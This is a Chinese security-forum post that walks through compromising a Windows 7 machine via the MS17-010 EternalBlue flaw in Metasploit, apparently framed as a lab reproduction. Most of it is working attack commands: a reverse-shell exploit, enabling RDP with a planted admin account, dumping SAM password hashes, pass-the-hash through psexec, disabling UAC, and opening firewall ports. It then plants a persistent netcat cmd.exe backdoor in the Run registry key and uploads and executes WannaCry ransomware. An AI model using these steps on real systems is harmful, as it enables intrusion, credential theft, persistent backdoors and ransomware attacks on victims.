查看: 13136|回复: 0

简单永恒之蓝渗透win7,上传后门开机自启

[复制链接]
  • TA的每日心情

    2024-8-23 23:16
  • 签到天数: 145 天

    [LV.7]常住居民III

    发表于 2022-12-6 07:53:53 | 显示全部楼层 |阅读模式
    并不是所有win7版本都适合用永恒之蓝,win10好像是可以用永恒之黑

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

    官方描述:https://docs.microsoft.com/zh-cn ... bulletins/2017/ms17永恒之蓝相关病毒,其实是利用了微软的 MS17-010 漏洞。MS17-010 是 Windows 系统一服务的漏洞,恶意代码会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意

    永恒之蓝是因为win7默认开启了445端口,才导致漏洞的发生

    下面开始复现

    首先我们启动一下msf

    1.msfdb run

    我比较喜欢用这个命令,当然也可以用msfconsole

    2.use auxiliary/scanner/smb/smb_ms17_010

    利用扫描模块检测漏洞的价值

    3.set rhosts xxx.xxx.xxx.xxx

    设置靶机ip,内网ip形式如:192.168.x.x,可以通过nmap扫描或cmd的ipconfig进行信息收集



    扫描完成后发现可利用,在进行下一步的步骤

    4.use exploit/windows/smb/ms17_010_eternalblue

    利用攻击脚本

    5.set rhosts xxx.xxx.xxx.xxx

    和上面的一样的意思

    其实可以show options

    查看参数,设置一下端口

    6.set lhost xxx.xxx.xxx.xxx

    注意这个填你主机ip

    7.set payloadwindows/x64/meterpreter/reverse_tcp

    这是重中之重,需要设置payload,如果靶机是64位的,那么用上面的,不是64位的,以上payload无效,没法进行渗透



    8. exploit

    直接开打



    getuid查看下权限



    后期可以提权

    打进来就可以有许多好玩的了哈哈哈

    比如screenshare 屏幕监视



    但这不是主要目的

    我们要创建账户,当然你也可以选择提取sam,我也会讲

    我们先说一下远程桌面



    实战:使用 enable_rdp 脚本开启远程桌面并创建用户
    ok,我们先了解一下rdp协议

    RDP 概述:远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)
    的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。

    远程桌面协议(RDP)是一个多通道(multi-channel)的协议,让使用者(所在计算机称为用户端或’本地计算机’)连上提供微软终端机服务的计算机(称为服务端或’远程计算机’)。
    大部分的Windows版本都有用户端所需软件,有些其他操作系统也有这些用户端软件,例如Linux,FreeBSD,MacOSX,服务端计算机方面,则听取送到TCPport3389的数据。
    简单的来说,就是你要远程桌面,就需要开启rdp
    启用远程桌面

    run post/windows/manage/enable_rdp

    创建一个新用户来远程连接 win7 桌面



    run post/windows/manage/enable_rdp USERNAME=admin
    PASSWORD=123456



    在 Kali 系统上,按下 Ctrl+shift+t 新建终端窗口,或点击终端按钮开启一个终端

    直接输入 rdesktop xxx.xxx.xxx.xxx

    靶机ip



    账户:admin

    密码:123456

    30 秒之后成功登陆远程桌面

    关闭主机防护策略并开启后门
    通过 ms17-010 永恒之蓝获取到的 shell 可能会出现操作受限的情况,所以我们使用主机的账户信息建立 session 进行连接



    SAM 概述:SAM 文件即账号密码数据库文件,SAM 文件的位置是:
    C:\Windows\System32\config\SAM

    回到 MSF 控制台,从 SAM 导出密码哈希

    hashdump



    我们创建一条防火墙规则允许 4444端口访问网络,否则我们建立 session 时 payload 不能通过 4444端口访问网络导致 session 建立失败。

    msf控制台输入shell

    再输入netsh firewall add portopening TCP 4444 “xuegod” ENABLE ALL

    UAC 概述:用户帐户控制(User Account Control,简写作 UAC)是微软公司在其 Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果

    关闭 UAC

    在windows shell下输入cmd.exe /k %windir%\System32\reg.exe ADD
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /tREG_DWORD /d 0 /f



    ADD 添加一个注册表项
    -v 创建键值
    -t 键值类型
    -d 键值的值
    -f 强制修改注册表项



    开启 win7 系统主机的默认共享,默认共享对 Windows 主机的文件共享非常方便,也方便黑客利用这个功能,远程执行命令

    cmd.exe /k %windir%\System32\reg.exe ADD
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /vLocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f



    C:\Windows\system32>exit C:\Windows\system32>exitC:\Windows\system32>exitexit我们先将 session 保存到后台meterpreter > backgrou



    使用 hash 值登录系统
    msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/psexec
    msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.56
    msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.53
    配置用户信息
    msf5 exploit(windows/smb/psexec) > set SMBUser xuegod
    密码使用哈希值
    msf5 exploit(windows/smb/psexec) > set SMBPass
    aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

    这里局域网中 SMBDomain 都是 WORKGROUP 如果是域用户需要配置域名称。
    msf5 exploit(windows/smb/psexec) > set SMBDomain WORKGROUP
    msf5 exploit(windows/smb/psexec) > exploit



    在msf控制台输入getuid



    我们可以看到虽然我们使用 xuegod 用户进行认证但是我们同样获取到了 SYSTEM 的权限
    下面我们配置一个后门程序,修改 UAC 的注册表,需要重启才能生效。
    上传 nc 到 Win7
    meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows
    注册表添加启动项执行 nc 反弹 shell 命令
    meterpreter > reg setval -k
    HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d ‘C:\windows\
    nc.exe -Ldp 443 -e cmd.exe’
    nc 参数解释:
    L 表示用户退出连接后重新进行端口侦听
    d 后台运行
    p 指定端口
    meterpreter > shell
    防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行。
    C:\Windows\system32> netsh firewall add portopening TCP 443 “xuegod443” ENABLE
    ALL
    重启 Win7
    C:\Windows\system32>shutdown -r -f -t 0
    -r 重启
    -f 强制
    -t 时间 0 表示立刻

    上传勒索文件至 C 盘根目录下,为了隐蔽可以传至更隐蔽目录
    upload wannacry.exe c:\
    2、执行勒索可执行文件即可
    execute -f c:\wannacry.exe
    在这里上传图片太麻烦了,所以我整理了文档,文档中的图片就比较全了,这篇文章在我的博客也发布了
    文档如下,禁止白嫖
    永恒之蓝.doc (1.46 MB, 下载次数: 11)
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-21 20:11 , Processed in 0.043954 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部